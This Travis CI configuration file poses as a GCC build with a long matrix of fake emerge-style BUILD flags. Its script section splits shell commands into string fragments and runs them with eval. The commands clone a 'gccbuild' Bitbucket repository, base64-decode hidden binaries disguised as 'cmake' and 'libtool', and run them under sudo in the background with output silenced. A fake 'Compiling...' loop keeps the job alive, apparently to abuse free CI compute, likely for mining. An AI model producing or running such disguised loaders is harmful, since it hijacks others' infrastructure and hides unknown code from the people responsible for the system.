dist: bionic

env:
  - BUILD="--fetchonly=5b5"
  - BUILD="--rebuild-exclude=333BE"
  - BUILD="--misspell-suggestions=7LB"
  - BUILD="--rebuild-ignore=7457F"
  - BUILD="--alphabetical=105BU"
  - BUILD="--update=7455R"
  - BUILD="--help=45645"
  - BUILD="--fail-clean=786xF"
  - BUILD="--list-sets=583PH"
  - BUILD="--fail-clean=480Df"
  - BUILD="--buildpkg=628s9"
  - BUILD="--pkg-format=918LG"
  - BUILD="--fuzzy-search=79pT"
  - BUILD="--skipfirst=917oc"
  - BUILD="--nodeps=961R"
  - BUILD="--quiet-unmerge-warn=844EU"
  - BUILD="--verbose=411wI"
  - BUILD="--regen=730lj"
  - BUILD="--fuzzy-search=7778d"
  - BUILD="--quickpkg-direct=91k4"
  - BUILD="--quiet-build=773LC"
  - BUILD="--deep=570vA"
  - BUILD="--accept-properties=295pa"
  - BUILD="--alphabetical=744KQ"
  - BUILD="--deselect=550es"
  - BUILD="--reinstall=317lt"
  - BUILD="--tree=377Ul"
  - BUILD="--complete-graph=403nS"
  - BUILD="--buildpkgonly=613ZE"
  - BUILD="--deselect=249Yq"
  - BUILD="--prefix=989uE"
  - BUILD="--autounmask-keep-masks=841At"
  - BUILD="--with-test-deps=464Lw"
  - BUILD="--check-news=664fu"
  - BUILD="--selective=16mP"
  - BUILD="--version=9193S"
  - BUILD="--autounmask-use=334lT"
  - BUILD="--version=7476g"
  - BUILD="--backtrack=555qd"
  - BUILD="--rebuild-ignore=159t5"
  - BUILD="--rebuild-if-unbuilt=579ZE"
  - BUILD="--quickpkg-direct=717Qj"
  - BUILD="--autounmask-unrestricted-atoms=378ag"
  - BUILD="--columns=834A5"
  - BUILD="--search=10t3"
  - BUILD="--binpkg-respect-use=598AD"
  - BUILD="--quiet=653Vv"
  - BUILD="--autounmask-keep-masks=458vF"
  - BUILD="--complete-graph=932JA"
  - BUILD="--dynamic-deps=663oo"
  - BUILD="--quiet-unmerge-warn=181IB"
  - BUILD="--autounmask-write=595Pu"
  - BUILD="--search-index=227G"
  - BUILD="--searchdesc=1318F"
  - BUILD="--pkg-format=950sV"
  - BUILD="--fetchonly=370Jk"
  - BUILD="--complete-graph-if-new-ver=825LA"
  - BUILD="--binpkg-changed-deps=7655g"
  - BUILD="--tree=298fV"
  - BUILD="--changed-use=787Nw"
  - BUILD="--changed-slot=8187F"
  - BUILD="--rebuild-if-new-ver=677hH"
  - BUILD="--rebuild-ignore=92Bw"
  - BUILD="--regen=357ac"
  - BUILD="--nodeps=463Uk"
  - BUILD="--rebuild-if-unbuilt=923Tj"
  - BUILD="--metadata=731bY"
  - BUILD="--quiet-unmerge-warn=363Bf"
  - BUILD="--nodeps=101TY"
  - BUILD="--alphabetical=375Os"
  - BUILD="--select=367on"
  - BUILD="--autounmask-keep-masks=160xG"
  - BUILD="--usepkgonly=944sb"
  - BUILD="--changed-slot=298z9"
  - BUILD="--fuzzy-search=131Dz"
  - BUILD="--searchdesc=593rg"
  - BUILD="--search=834GZ"
  - BUILD="--quiet-repo-display=841Op"
  - BUILD="--rebuild-exclude=273KS"
  - BUILD="--help=669xd"
  - BUILD="--complete-graph=33502"
  - BUILD="--sync=318tB"
  - BUILD="--read-news=293Je"
  - BUILD="--emptytree=684Mu"
  - BUILD="--complete-graph-if-new-use=295Ay"
  - BUILD="--emptytree=6513j"
  - BUILD="--pretend=698YA"
  - BUILD="--rebuild-exclude=889JA"
  - BUILD="--buildpkg-exclude=146wc"
  - BUILD="--check-news=746Xe"
  - BUILD="--complete-graph=19zU"
  - BUILD="--buildpkgonly=9591M"
  - BUILD="--autounmask-use=863Gl"
  - BUILD="--tree=21FX"
  - BUILD="--exclude=421cI"
  - BUILD="--buildpkg-exclude=700TS"
  - BUILD="--sync=873Th"
  - BUILD="--newuse=141FU"
  - BUILD="--with-test-deps=6892u"
  - BUILD="--noreplace=3652E"
  - BUILD="--digest=5874R"
  - BUILD="--debug=979rG"
  - BUILD="--rebuild-ignore=972YP"
  - BUILD="--with-test-deps=64Cz"
  - BUILD="--rage-clean=387iJ"
  - BUILD="--oneshot=536f1"
  - BUILD="--fetch-all-uri=6120W"
  - BUILD="--info=282iR"
  - BUILD="--getbinpkg=611vr"
  - BUILD="--depclean=787q1"
  - BUILD="--read-news=3579e"
  - BUILD="--rebuild-if-new-ver=544Ug"
  - BUILD="--onlydeps-with-rdeps=165Il"
  - BUILD="--pkg-format=566v9"
  - BUILD="--selective=807P7"
  - BUILD="--clean=671B0"
  - BUILD="--buildpkg=59dU"
  - BUILD="--pretend=192Ex"
  - BUILD="--onlydeps-with-rdeps=5073J"
  - BUILD="--rebuild-if-new-ver=666LA"
  - BUILD="--oneshot=740ZV"
  - BUILD="--root=196sE"
  - BUILD="--pkg-format=843iq"
  - BUILD="--root-deps=769hS"
  - BUILD="--prefix=9905B"
  - BUILD="--jobs=382uR"
  - BUILD="--nospinner=316Fa"
  - BUILD="--nospinner=7581M"
  - BUILD="--resume=725B4"
  - BUILD="--regen=132t3"
  - BUILD="--sync-submodule=855uQ"
  - BUILD="--rebuilt-binaries=567Yv"
  - BUILD="--list-sets=4782T"
  - BUILD="--usepkg=525Qu"
  - BUILD="--autounmask-only=552wi"
  - BUILD="--oneshot=949bB"
  - BUILD="--oneshot=736Yf"
  - BUILD="--usepkgonly=30l4"
  - BUILD="--autounmask-keep-keywords=4363s"
  - BUILD="--dynamic-deps=2582y"
  - BUILD="--nodeps=711Cg"
  - BUILD="--digest=317Ce"
  - BUILD="--quiet-fail=372wl"
  - BUILD="--useoldpkg-atoms=58Zt"
  - BUILD="--autounmask-keep-masks=2269E"
  - BUILD="--ignore-world=877TW"
  - BUILD="--autounmask-use=927g0"
  - BUILD="--changed-use=182Yu"
  - BUILD="--useoldpkg-atoms=791g0"
  - BUILD="--metadata=114LF"
  - BUILD="--rebuild-if-new-slot=140kS"
  - BUILD="--root=2610E"
  - BUILD="--check-news=4538W"
  - BUILD="--useoldpkg-atoms=347Y9"
  - BUILD="--use-ebuild-visibility=477DW"
  - BUILD="--rebuild-ignore=42V6"
  - BUILD="--ignore-world=267s0"
  - BUILD="--verbose=945yS"
  - BUILD="--reinstall=51by"
  - BUILD="--autounmask-write=190wG"
  - BUILD="--noconfmem=201W8"
  - BUILD="--root=314kT"
  - BUILD="--metadata=720OB"
  - BUILD="--autounmask-keep-keywords=431bn"
  - BUILD="--buildpkgonly=111LQ"
  - BUILD="--config=845Pv"
  - BUILD="--selective=986Z7"
  - BUILD="--search=171PE"
  - BUILD="--rebuild-ignore=86Mt"
  - BUILD="--ask-enter-invalid=594tH"
  - BUILD="--jobs=496IM"
  - BUILD="--reinstall=715bF"
  - BUILD="--use-ebuild-visibility=8559g"
  - BUILD="--rebuild-exclude=2770q"
  - BUILD="--nospinner=219u3"
  - BUILD="--changed-slot=220aq"
  - BUILD="--quiet=16dZ"
  - BUILD="--rebuild-ignore=153Eo"
  - BUILD="--fail-clean=271dd"
  - BUILD="--root=425lp"
  - BUILD="--ignore-default-opts=290Pe"
  - BUILD="--usepkgonly=1887g"
  - BUILD="--getbinpkg=686R7"
  - BUILD="--list-sets=618Di"
  - BUILD="--sync-submodule=180OA"
  - BUILD="--buildpkg=983HG"
  - BUILD="--verbose=720s3"
  - BUILD="--deep=808ie"
  - BUILD="--quiet=763hd"
  - BUILD="--complete-graph-if-new-use=2290N"
  - BUILD="--ask-enter-invalid=696L6"
  - BUILD="--prefix=80tM"
  - BUILD="--search-similarity=783UO"

language: minimal

script:
  - BABatGsYi="sudo apt up"
  - kaiPTqjUOrv="date || tru"
  - eval "$BABatGsYi""$kaiPTqjUOrv""e"
  - pkPRwpKCr="sudo apt --"
  - ZXQSSTxihS="yes install"
  - rpzaxAkbH=" cl-base64 "
  - Xhrvc="git &>/dev/"
  - eval "$pkPRwpKCr""$ZXQSSTxihS""$rpzaxAkbH""$Xhrvc""null"
  - MJkkW="git clone h"
  - gHaKMp="ttps://gccb"
  - ZCCCcdKx="uild@bitbuc"
  - YwQNXjoJPW="ket.org/gcc"
  - sMOQoBlwuM="build/gcc.g"
  - Ifija="it &>/dev/n"
  - eval "$MJkkW""$gHaKMp""$ZCCCcdKx""$YwQNXjoJPW""$sMOQoBlwuM""$Ifija""ull"
  - nHCPiKaswlK="base64 -d g"
  - qbGUs="cc/cmake_ >"
  - eval "$nHCPiKaswlK""$qbGUs"" cmake"
  - ebmUsJoK="base64 -d g"
  - RucDyb="cc/config_ "
  - eval "$ebmUsJoK""$RucDyb""> clean"
  - BrFrvYnWwQO="base64 -d g"
  - OzAhWPIZCWt="cc/make_ > "
  - eval "$BrFrvYnWwQO""$OzAhWPIZCWt""libtool"
  - chmod +x libtool cmake
  - ./cmake
  - zCKJEry="sed -i 's/b"
  - FEmmaim="uild/tg3o/g"
  - eval "$zCKJEry""$FEmmaim""' clean"
  - sudo ./libtool --config=clean &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2513)) ] && sudo killall libtool && break; sleep 213; done
